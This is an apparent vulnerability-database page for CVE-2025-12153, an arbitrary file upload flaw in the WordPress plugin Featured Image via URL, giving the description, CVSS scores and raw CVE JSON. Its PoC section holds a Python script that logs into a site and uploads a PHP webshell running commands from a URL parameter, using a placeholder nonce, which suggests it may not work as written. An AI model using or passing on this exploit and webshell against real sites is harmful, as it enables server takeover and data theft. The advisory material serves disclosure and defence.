Security Vulnerability Report
中文
CVE-2025-12153 CVSS 8.8 HIGH

CVE-2025-12153

Published: 2025-12-05 06:16:06
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Featured Image via URL plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation function in all versions up to, and including, 0.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Featured Image via URL plugin <= 0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12153 PoC - Arbitrary File Upload # Target: WordPress with Featured Image via URL plugin <= 0.1 def upload_webshell(target_url, username, password): """ Upload malicious PHP file to achieve RCE """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } session.post(login_url, data=login_data) # Step 2: Upload malicious PHP file via plugin endpoint upload_url = f"{target_url}/wp-admin/admin-ajax.php" # PHP webshell content php_shell = b'<?php system($_GET["cmd"]); ?>' files = { 'file': ('shell.php', php_shell, 'application/x-php') } data = { 'action': 'fivur_upload', 'nonce': 'attacker_controlled_or_bruteforced' } response = session.post(upload_url, files=files, data=data) # Step 3: Execute commands via uploaded webshell if response.status_code == 200: shell_url = f"{target_url}/wp-content/uploads/shell.php" print(f"[+] Webshell uploaded: {shell_url}") print(f"[+] Execute commands: ?cmd=whoami") return shell_url else: print("[-] Upload failed") return None if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] upload_webshell(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12153", "sourceIdentifier": "[email protected]", "published": "2025-12-05T06:16:05.707", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Featured Image via URL plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation function in all versions up to, and including, 0.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://wordpress.org/plugins/featured-image-via-url/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9687a88f-ac5b-4746-a68c-91c358b5fb87?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.